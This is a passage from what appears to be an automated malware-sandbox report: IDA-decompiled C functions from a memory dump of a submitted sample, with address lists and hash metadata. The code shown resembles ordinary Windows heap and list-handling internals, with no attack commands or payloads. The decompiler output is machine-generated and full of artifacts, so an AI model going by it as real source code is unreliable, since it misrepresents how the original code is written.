                                                                              0x0178aea3
                                                                              0x0178aea3
                                                                              0x0178aeaa
                                                                              0x017d26c0
                                                                              0x017d26c9
                                                                              0x017d26c9
                                                                              0x0178aeb3
                                                                              0x017d26d4
                                                                              0x017d26e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d26e7
                                                                              0x017d26ee
                                                                              0x017d26f0
                                                                              0x017d26f9
                                                                              0x017d26f9
                                                                              0x017d2702
                                                                              0x017d2708
                                                                              0x017d2708
                                                                              0x017d270b
                                                                              0x017d270f
                                                                              0x017d2711
                                                                              0x017d2711
                                                                              0x017d2725
                                                                              0x017d2725
                                                                              0x00000000
                                                                              0x0178aeb9
                                                                              0x0178aeb9
                                                                              0x0178aebf
                                                                              0x0178aebf
                                                                              0x0178aeb3

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                              • Instruction ID: cfe537e1597ccda93622ea4c4f083f583a0b344045d7917769e5cdce09b1bfa4
                                                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                              • Instruction Fuzzy Hash: 8B21C232641789DFE726AB29C948B25FBE8EF44350F1904E1DE048B6A3D734DC42C6A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179FD9B Relevance: .1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0179FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E017776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                              0x0179fd9b
                                                                              0x0179fda0
                                                                              0x0179fda1
                                                                              0x0179fdab
                                                                              0x0179fdad
                                                                              0x0179fdb0
                                                                              0x0179fdb8
                                                                              0x0179fe0f
                                                                              0x0179fde6
                                                                              0x0179fde9
                                                                              0x0179fdec
                                                                              0x017dc0c0
                                                                              0x0179fdfe
                                                                              0x0179fe06
                                                                              0x0179fe06
                                                                              0x017dc0c8
                                                                              0x0179fe2d
                                                                              0x0179fe2d
                                                                              0x00000000
                                                                              0x0179fe2d
                                                                              0x017dc0d1
                                                                              0x017dc0e0
                                                                              0x017dc0e5
                                                                              0x017dc0e5
                                                                              0x017dc0e8
                                                                              0x00000000
                                                                              0x017dc0e8
                                                                              0x0179fdf4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179fdf6
                                                                              0x0179fdfa
                                                                              0x0179fe1a
                                                                              0x0179fe1f
                                                                              0x0179fe1f
                                                                              0x0179fdfc
                                                                              0x00000000
                                                                              0x0179fdfc
                                                                              0x0179fdcc
                                                                              0x0179fdd0
                                                                              0x0179fe26
                                                                              0x00000000
                                                                              0x0179fe26
                                                                              0x0179fdd8
                                                                              0x0179fddb
                                                                              0x0179fddd
                                                                              0x0179fde0
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                              • Instruction ID: e693ed044bb77f0d07afa02e061083279773a55af54ac7f17a6e9831660305e7
                                                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                              • Instruction Fuzzy Hash: 37217972A40A45DBDB35CF0DE940A66FBE5EB98B10F2481AEE959C7615D730AC44CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179B390 Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E0179B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01782280(_t12, 0x1858608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017A00C2(0x1858608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                              0x0179b395
                                                                              0x0179b3a2
                                                                              0x0179b3a5
                                                                              0x0179b3aa
                                                                              0x0179b3b2
                                                                              0x0179b3ba
                                                                              0x0179b3bd
                                                                              0x0179b3c0
                                                                              0x0179b3c4
                                                                              0x0179b3c9
                                                                              0x017da3e9
                                                                              0x017da3ed
                                                                              0x017da3f0
                                                                              0x017da3ff
                                                                              0x017da403
                                                                              0x017da409
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017da40b
                                                                              0x017da40b
                                                                              0x017da40f
                                                                              0x017da415
                                                                              0x017da423
                                                                              0x017da423
                                                                              0x017da415
                                                                              0x0179b3d1
                                                                              0x0179b3e8
                                                                              0x0179b3e8
                                                                              0x0179b3d9

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 256dfc90e84bb0a99f97df400a9eb3175826bd0834ab7aee8e23e6e7183c8973
                                                                              • Instruction ID: 125bfd255286399fc8ef2d1cb438f8b55a0e6d3aaa52c5d776415a7eec1a1565
                                                                              • Opcode Fuzzy Hash: 256dfc90e84bb0a99f97df400a9eb3175826bd0834ab7aee8e23e6e7183c8973
                                                                              • Instruction Fuzzy Hash: 02116B333051109FCB19DA19AD81A2BF2A7FBD5330B250139DE16C7380CD319D06C794
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01769240 Relevance: .1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 77%
                                                                              			E01769240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x183f708);
				E017BD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E017A95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017A95D0();
				_t33 =  *0x18584c4; // 0x0
				L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18584c4; // 0x0
				L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18584c4; // 0x0
				E01782280(L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017A95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017A95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01769325();
					_t50 =  *0x18584c4; // 0x0
					return E017BD0D1(L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                              0x01769240
                                                                              0x01769242
                                                                              0x01769247
                                                                              0x0176924c
                                                                              0x0176924e
                                                                              0x01769255
                                                                              0x01769257
                                                                              0x0176925a
                                                                              0x0176925f
                                                                              0x0176925f
                                                                              0x01769266
                                                                              0x01769271
                                                                              0x01769276
                                                                              0x01769279
                                                                              0x0176927e
                                                                              0x01769295
                                                                              0x0176929a
                                                                              0x017692b1
                                                                              0x017692b6
                                                                              0x017692d7
                                                                              0x017692dc
                                                                              0x017692e0
                                                                              0x017692e6
                                                                              0x017692e8
                                                                              0x017692ee
                                                                              0x01769332
                                                                              0x01769333
                                                                              0x01769337
                                                                              0x01769338
                                                                              0x0176933a
                                                                              0x0176933a
                                                                              0x0176933d
                                                                              0x01769342
                                                                              0x01769342
                                                                              0x01769345
                                                                              0x01769349
                                                                              0x0176934e
                                                                              0x01769352
                                                                              0x01769357
                                                                              0x017692f4
                                                                              0x017692f4
                                                                              0x017692f6
                                                                              0x017692f9
                                                                              0x01769300
                                                                              0x01769306
                                                                              0x01769324
                                                                              0x01769324

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: cb5da094a488697d3e0c51a89ea67720ceaee4cd6d2743e119484d9328bb5ac3
                                                                              • Instruction ID: 6175ec0fc8e1848e7251ab2cd859da574a634857a61a3f6846469e20e4552269
                                                                              • Opcode Fuzzy Hash: cb5da094a488697d3e0c51a89ea67720ceaee4cd6d2743e119484d9328bb5ac3
                                                                              • Instruction Fuzzy Hash: C4217831041641DFC322FF29CA44F59BBF9FF18308F14456CA14A866A6CB38EA41CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017F4257 Relevance: .1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E017F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x18408d0);
				E017BD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E017F41E8(__ebx, __edi, __ecx, _t39);
				E0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18587e4;
					_t18 =  *0x18587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1855cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01767055(_t31 + 0xfffffff8);
								_t24 =  *0x18587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1855cd0;
				if( *0x1855cd0 <= 0) {
					L01767055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18587e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18587e8 = _t30;
						 *0x18587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E017BD0D1(L017F4320());
			}















                                                                              0x017f4257
                                                                              0x017f4257
                                                                              0x017f4257
                                                                              0x017f4259
                                                                              0x017f425e
                                                                              0x017f4263
                                                                              0x017f4265
                                                                              0x017f4273
                                                                              0x017f4278
                                                                              0x017f427c
                                                                              0x017f427f
                                                                              0x017f4281
                                                                              0x017f4287
                                                                              0x017f42d7
                                                                              0x017f42d7
                                                                              0x017f42da
                                                                              0x017f428d
                                                                              0x017f428d
                                                                              0x017f428f
                                                                              0x017f4292
                                                                              0x017f4297
                                                                              0x017f429c
                                                                              0x017f42a0
                                                                              0x017f42a6
                                                                              0x017f42a8
                                                                              0x017f42ae
                                                                              0x017f42b3
                                                                              0x00000000
                                                                              0x017f42ba
                                                                              0x017f42ba
                                                                              0x017f42bf
                                                                              0x017f42c5
                                                                              0x017f42ca
                                                                              0x017f42cf
                                                                              0x017f42d0
                                                                              0x00000000
                                                                              0x017f42d0
                                                                              0x017f42b3
                                                                              0x00000000
                                                                              0x017f42a6
                                                                              0x017f429c
                                                                              0x017f42dc
                                                                              0x017f42dc
                                                                              0x017f42e3
                                                                              0x017f4309
                                                                              0x017f42e5
                                                                              0x017f42e5
                                                                              0x017f42e8
                                                                              0x017f42ee
                                                                              0x017f42f0
                                                                              0x00000000
                                                                              0x017f42f2
                                                                              0x017f42f2
                                                                              0x017f42f4
                                                                              0x017f42f7
                                                                              0x017f42f9
                                                                              0x017f4300
                                                                              0x017f4300
                                                                              0x017f42f0
                                                                              0x017f430e
                                                                              0x017f431f

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e2f4ea424514bc702a9638aebabdcc649c66acf937c08fffa65563bc83b74af
                                                                              • Instruction ID: de13de0148d7b1f2b743638707c4a45d979e8fb9cc01fe4793e9d177e923575d
                                                                              • Opcode Fuzzy Hash: 4e2f4ea424514bc702a9638aebabdcc649c66acf937c08fffa65563bc83b74af
                                                                              • Instruction Fuzzy Hash: F0215879500701CFCB25DF69D144A56FBB1FB86358B5082AEC2068B399DB399691CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01792397 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E01792397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x185848c != 0) {
					L0178FAD0(0x1858610);
					if( *0x185848c == 0) {
						E0178FA00(0x1858610, _t19, _t27, 0x1858610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01792581(0x1858610, 0x17450a0, _t26, _t27, _t28);
						E0178FA00(0x1858610, 0x17450a0, _t27, 0x1858610);
					}
				} else {
					L1:
					_t11 =  *0x1858614; // 0x0
					if(_t11 == 0) {
						_t11 = E017A4886(0x1741088, 1, 0x1858614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01792581(0x1858610, (_t11 << 4) + 0x1745070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                              0x017923b0
                                                                              0x017923b6
                                                                              0x01792409
                                                                              0x01792415
                                                                              0x017d5ae9
                                                                              0x00000000
                                                                              0x0179241b
                                                                              0x0179241b
                                                                              0x0179241d
                                                                              0x01792427
                                                                              0x0179242e
                                                                              0x01792430
                                                                              0x01792430
                                                                              0x017923b8
                                                                              0x017923b8
                                                                              0x017923b8
                                                                              0x017923bf
                                                                              0x017923fc
                                                                              0x017923fc
                                                                              0x017923c1
                                                                              0x017923c3
                                                                              0x017923d0
                                                                              0x017923d8
                                                                              0x017923d8
                                                                              0x017923dc
                                                                              0x017923de
                                                                              0x017923e1
                                                                              0x017923e1
                                                                              0x017923ec

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 912857cedfdc1b0917748449104f5e6034cdb15e99d6fa82dbb9472eab0dc139
                                                                              • Instruction ID: f8de3ad8f21fabdce05662aa62711f73502dc5ec7710ec65876068c206a28878
                                                                              • Opcode Fuzzy Hash: 912857cedfdc1b0917748449104f5e6034cdb15e99d6fa82dbb9472eab0dc139
                                                                              • Instruction Fuzzy Hash: DE112B3174430177EB30B63ABC88B15F6D8FBA1660F14406BFA02D7256CAB4E9488B64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E46A7 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E017E46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E017AF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0179D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L017877F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                              0x017e46b7
                                                                              0x017e46ba
                                                                              0x017e46c5
                                                                              0x017e46c8
                                                                              0x017e46d0
                                                                              0x017e46d4
                                                                              0x017e46e6
                                                                              0x017e46e9
                                                                              0x017e46f4
                                                                              0x017e46ff
                                                                              0x017e4705
                                                                              0x017e4706
                                                                              0x017e470c
                                                                              0x017e4713
                                                                              0x017e471b
                                                                              0x017e4723
                                                                              0x017e4725
                                                                              0x017e46d6
                                                                              0x017e46d9
                                                                              0x017e46db
                                                                              0x017e46db
                                                                              0x017e4732

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                              • Instruction ID: e3883a19770270f254430231cdaca3d350f02a5b984c90a0590c68268c5f22bb
                                                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                              • Instruction Fuzzy Hash: 4E112572504208BBCB05AF5CD8809BEFBF9EF99304F1080AAF945C7350DA318D55C7A4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176C962 Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 42%
                                                                              			E0176C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x185d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0177EEF0(0x18570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E017EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0177EB70(_t29, 0x18570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E017AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E017EF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18570c0; // 0x0
					while(_t38 != 0x18570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x185b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                              0x0176c96a
                                                                              0x0176c974
                                                                              0x0176c988
                                                                              0x0176c98a
                                                                              0x017d7c9d
                                                                              0x017d7c9f
                                                                              0x017d7ca4
                                                                              0x017d7cae
                                                                              0x017d7cf0
                                                                              0x017d7cf5
                                                                              0x017d7cfa
                                                                              0x0176c992
                                                                              0x0176c996
                                                                              0x0176c997
                                                                              0x0176c998
                                                                              0x0176c9a3
                                                                              0x0176c9a3
                                                                              0x017d7cb0
                                                                              0x017d7cb7
                                                                              0x017d7cbb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7cbd
                                                                              0x017d7ce8
                                                                              0x017d7cc5
                                                                              0x017d7cc8
                                                                              0x017d7cca
                                                                              0x017d7cd0
                                                                              0x017d7cd6
                                                                              0x017d7cde
                                                                              0x017d7ce4
                                                                              0x017d7ce4
                                                                              0x017d7cd0
                                                                              0x00000000
                                                                              0x017d7ce8
                                                                              0x0176c990
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6796b27d5e339ae7fef432d4a3f9e1898c0b6f55aa5b268a618c7ee5fa55bbef
                                                                              • Instruction ID: cd27ccd932e448f16809aaaa03371db2cf59eb53159c13d7edec61ddf98384ad
                                                                              • Opcode Fuzzy Hash: 6796b27d5e339ae7fef432d4a3f9e1898c0b6f55aa5b268a618c7ee5fa55bbef
                                                                              • Instruction Fuzzy Hash: 1C11C23130070A9FC765AE2CCC8992BFBF9FB88718B400569ED4983651EB24ED10CBD1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A37F5 Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E017A37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01782280(_t6, 0x1858550);
				}
				_t29 = E017A387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0177FFB0(0x1858550, _t27, 0x1858550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                              0x017a37fa
                                                                              0x017a37fc
                                                                              0x017a3805
                                                                              0x017a3808
                                                                              0x017a3808
                                                                              0x017a3814
                                                                              0x017a3818
                                                                              0x017a3846
                                                                              0x017a3848
                                                                              0x017a384b
                                                                              0x017a384b
                                                                              0x017a3852
                                                                              0x00000000
                                                                              0x017a3854
                                                                              0x017a3856
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a3863
                                                                              0x00000000
                                                                              0x017a3863
                                                                              0x017a381a
                                                                              0x017a381a
                                                                              0x017a381f
                                                                              0x017a386e
                                                                              0x017a386e
                                                                              0x017a3871
                                                                              0x017a3873
                                                                              0x017a3873
                                                                              0x017a3868
                                                                              0x00000000
                                                                              0x017a3868
                                                                              0x017a3821
                                                                              0x017a3826
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a3828
                                                                              0x017a382a
                                                                              0x017a3841
                                                                              0x00000000
                                                                              0x017a3841

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c7a3bdb3609d0ef8d76b6278cbb4b013b4bc820b5905173ffb26cf5f6f732d5
